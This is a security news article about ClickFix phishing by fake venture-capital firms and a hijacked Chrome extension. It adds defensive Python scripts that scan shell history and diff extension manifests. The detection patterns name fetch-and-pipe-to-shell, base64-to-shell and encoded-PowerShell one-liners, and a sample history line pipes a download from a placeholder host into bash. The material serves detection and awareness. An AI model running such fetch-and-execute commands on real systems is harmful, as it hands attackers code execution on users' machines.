Recent attacks on cryptocurrency holders combine phishing from fake venture capital firms with bogus Zoom links to run "ClickFix" scams, which copy a malicious command to the victim's clipboard and trick the victim into running it.
Recent Crypto Attacks Exploit Venture Capital Firms and Browser Extensions
Cybersecurity firm Moonlock Lab recently uncovered a sophisticated phishing campaign in which attackers impersonate venture capital firms to carry out "ClickFix" attacks. The attackers first approach targets on LinkedIn with fake partnership offers, then send links to what appear to be Zoom or Google Meet calls. The link leads to a page that imitates Cloudflare's "I'm not a robot" verification checkbox. Clicking the checkbox silently writes a malicious command to the clipboard, and the page then instructs the victim to paste it into the terminal and run it. That paste is the attack: the victim, not an exploit, executes the payload.
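The mechanism above (a web page puts a command on the clipboard and talks the victim into pasting it into a terminal) leaves a trace where endpoint tooling can see it: the command itself, in shell history or process telemetry. The Python script below is an added example, not code from Moonlock Lab or from the page. It runs a few generic ClickFix heuristics over constructed sample command lines. The patterns are assumptions about what such pasted one-liners typically look like (fetch-and-pipe-to-shell, base64-decode-to-shell, inline osascript), extended with the Windows variants (encoded PowerShell, mshta) that ClickFix campaigns outside the macOS case on this page use; none of them are indicators taken from this campaign, and the sample hosts use the reserved .invalid TLD.

```python
import re

# Heuristic patterns for the kind of one-liner a ClickFix page asks the victim
# to paste. Constructed for this example; not indicators from the reported campaign.
INDICATORS = {
    # curl/wget output piped straight into a shell: no file ever touches disk
    "remote_fetch_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.I),
    # an encoded blob decoded and executed in one go
    "base64_decode_to_shell": re.compile(
        r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I),
    # eval of a command substitution that fetches or decodes its own payload
    "eval_of_fetched_or_decoded": re.compile(
        r"\beval\s+[\"']?\$\(\s*(curl|wget|echo|base64|printf)\b", re.I),
    # macOS-specific: AppleScript one-liners are a common second stage on Macs
    "macos_osascript_inline": re.compile(r"\bosascript\s+-e\b", re.I),
    # Windows variants of the same lure (generalisation beyond the macOS case)
    "windows_encoded_powershell": re.compile(
        r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I),
    "windows_mshta_remote": re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
}

# zsh EXTENDED_HISTORY lines look like ": 1700000001:0;command"; bash lines are bare.
_ZSH_PREFIX = re.compile(r"^: \d+:\d+;")


def strip_history_prefix(line: str) -> str:
    """Return the bare command from a zsh extended-history or bash history line."""
    return _ZSH_PREFIX.sub("", line.rstrip("\n")).strip()


def clickfix_indicators(command: str) -> list[str]:
    """Names of every indicator that fires on a single command line (may be empty)."""
    return [name for name, rx in INDICATORS.items() if rx.search(command)]


def scan_history(lines) -> list[tuple[int, str, list[str]]]:
    """Return (line_no, command, indicators) for every line that trips an indicator."""
    hits = []
    for n, raw in enumerate(lines, start=1):
        cmd = strip_history_prefix(raw)
        found = clickfix_indicators(cmd)
        if found:
            hits.append((n, cmd, found))
    return hits


# Constructed sample: benign shell-history lines mixed with the kind of command a
# ClickFix lure produces. The base64 blob decodes to "echo hi" and the PowerShell
# blob to UTF-16LE "ABC"; both are harmless placeholders.
SAMPLE_HISTORY = [
    ": 1700000001:0;git status",
    ": 1700000002:0;brew update && brew upgrade",
    ": 1700000003:0;curl -fsSL https://verify.example.invalid/check.sh | bash",
    ": 1700000004:0;echo ZWNobyBoaQ== | base64 -d | sh",
    ": 1700000005:0;ls -la ~/Downloads",
    "powershell -w hidden -ep bypass -enc QQBCAEMA",
]

if __name__ == "__main__":
    for line_no, cmd, found in scan_history(SAMPLE_HISTORY):
        print(f"line {line_no}: {', '.join(found)}\n    {cmd}")
```

Run it against a real `~/.zsh_history` or `~/.bash_history` by reading the file into `scan_history`; the regexes are deliberately loose, so treat a hit as a prompt to look at the command, not as a verdict.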
### Sophisticated Tactics and Rotating Identities
Moonlock Lab identified personas operating under names such as Mykhailo Hureiev as the primary points of contact during the initial LinkedIn approach. The campaign's infrastructure is notably well organised: Moonlock Lab notes that it rotates identities quickly whenever one front is exposed.
### Chrome Extension Hijacked to Steal Crypto
Separately, crypto-focused attackers are delivering a "ClickFix" lure through a malicious Chrome extension. The QuickLens add-on, originally a tool for running Google Lens searches, changed ownership in February and was then repurposed by its new owners: the updated version shipped with scripts capable of launching ClickFix attacks alongside other information-stealing components.
### Extensive Data Theft Capabilities
According to Annex Security, which reported the incident, QuickLens had around 7,000 active users when it was compromised. The hijacked extension reportedly searched for cryptocurrency wallet data and seed phrases, allowing funds to be drained directly from users' wallets. It also harvested login credentials and payment details from Gmail inboxes, YouTube channel data, and other web forms.
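The QuickLens case is a supply-chain problem: an extension users already trusted changed hands and then started asking for far more than a Google Lens lookup needs. One check a practitioner can automate is to diff an extension's manifest across versions and flag the permission combinations that make wallet and webmail theft possible. The script below is an added example, not QuickLens's manifest or Annex Security's analysis. Both manifests are constructed for illustration, and the risk rules (broad host access, scripting/cookies/clipboard permissions, content scripts aimed at Gmail or YouTube, a CSP that permits eval) are assumptions about what a repurposed extension tends to add. The profile paths are Chrome's default locations.

```python
import json
from pathlib import Path
from typing import Iterator

# Host patterns that grant an extension access to every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# API permissions that, combined with broad host access, let an extension read
# page content (wallet UIs, webmail, forms), touch cookies, or stage a ClickFix
# lure by writing to the clipboard. Assumed list for this example.
SENSITIVE_PERMS = {
    "scripting", "webRequest", "webRequestBlocking", "declarativeNetRequest",
    "cookies", "tabs", "webNavigation", "clipboardWrite", "clipboardRead",
    "downloads", "nativeMessaging", "debugger",
}

# Services the page reports the hijacked extension harvested from.
WATCHED_HOSTS = ("mail.google.com", "youtube.com")


def _is_host_pattern(p: str) -> bool:
    return p == "<all_urls>" or "://" in p


def host_patterns(manifest: dict) -> set[str]:
    """All host match patterns: MV3 host_permissions, MV2 hosts mixed into
    permissions, and every content_scripts 'matches' entry."""
    pats = set(manifest.get("host_permissions", []))
    pats |= {p for p in manifest.get("permissions", []) if _is_host_pattern(p)}
    for cs in manifest.get("content_scripts", []):
        pats |= set(cs.get("matches", []))
    return pats


def api_permissions(manifest: dict) -> set[str]:
    """Chrome API permissions only (host patterns filtered out)."""
    return {p for p in manifest.get("permissions", []) if not _is_host_pattern(p)}


def risk_flags(manifest: dict) -> list[str]:
    """Human-readable flags for permission combinations worth a second look."""
    flags = []
    hosts = host_patterns(manifest)
    if hosts & BROAD_HOSTS:
        flags.append("broad_host_access")
    if any(w in h for h in hosts for w in WATCHED_HOSTS):
        flags.append("targets_gmail_or_youtube")
    sensitive = sorted(api_permissions(manifest) & SENSITIVE_PERMS)
    if sensitive:
        flags.append("sensitive_permissions:" + ",".join(sensitive))
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):          # MV3 form: {"extension_pages": "..."}
        csp = csp.get("extension_pages", "")
    if "unsafe-eval" in csp:
        flags.append("csp_allows_eval")
    return flags


def permission_delta(old: dict, new: dict) -> dict:
    """What a new version asks for that the trusted old version did not."""
    return {
        "added_permissions": sorted(api_permissions(new) - api_permissions(old)),
        "added_hosts": sorted(host_patterns(new) - host_patterns(old)),
        "risk_flags": risk_flags(new),
    }


def installed_manifests() -> Iterator[Path]:
    """manifest.json of every installed extension in Chrome's default profile
    layout on macOS, Linux and Windows (Chrome default paths; missing roots skipped)."""
    home = Path.home()
    for root in (
        home / "Library/Application Support/Google/Chrome",   # macOS
        home / ".config/google-chrome",                        # Linux
        home / "AppData/Local/Google/Chrome/User Data",        # Windows
    ):
        if root.is_dir():
            yield from root.glob("*/Extensions/*/*/manifest.json")


# Constructed manifests standing in for "before" and "after" an ownership change.
# Neither is QuickLens's real manifest.
OLD_MANIFEST = {
    "manifest_version": 3, "name": "Lens lookup (constructed)", "version": "1.4.0",
    "permissions": ["contextMenus", "activeTab"],
    "action": {"default_title": "Search with Lens"},
}
NEW_MANIFEST = {
    "manifest_version": 3, "name": "Lens lookup (constructed)", "version": "2.0.0",
    "permissions": ["contextMenus", "activeTab", "scripting", "cookies",
                    "clipboardWrite", "storage"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["https://mail.google.com/*",
                                     "https://www.youtube.com/*"],
                         "js": ["inject.js"]}],
}

if __name__ == "__main__":
    print(json.dumps(permission_delta(OLD_MANIFEST, NEW_MANIFEST), indent=2))
    for path in installed_manifests():   # extension id @ version: flags
        flags = risk_flags(json.loads(path.read_text(encoding="utf-8")))
        if flags:
            print(f"{path.parents[1].name}@{path.parent.name}: {', '.join(flags)}")
```

The useful signal is the delta, not the absolute permission set: a Lens search helper that suddenly wants `<all_urls>`, `scripting`, `cookies` and `clipboardWrite`, plus content scripts on Gmail and YouTube, has changed purpose even if each permission on its own has a legitimate use somewhere.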
### Widespread Use of ClickFix Attacks
The "ClickFix" technique has gained traction among threat actors since last year because it sidesteps conventional security controls: the victim copies the payload and runs it by hand in a terminal they already trust, so there is no malicious attachment, download or exploit for those controls to block. Moonlock Lab reports that the method is now used against organisations in manufacturing, wholesale and retail, state and local government, and utilities.
### Historical Tracking of ClickFix
Security researchers have tracked "ClickFix" since at least 2024, a longer record than its recent prominence suggests. Microsoft Threat Intelligence warned in August of last year about campaigns targeting enterprise and end-user devices worldwide, across multiple sectors.
In summary, these incidents show cybercriminals leaning on social engineering rather than software exploits to compromise users. The practical defence follows from the technique itself: no legitimate verification page, meeting link or CAPTCHA ever requires you to paste a command into a terminal, so any page that does should be treated as malicious, and installed browser extensions deserve a fresh look whenever they change ownership or request new permissions.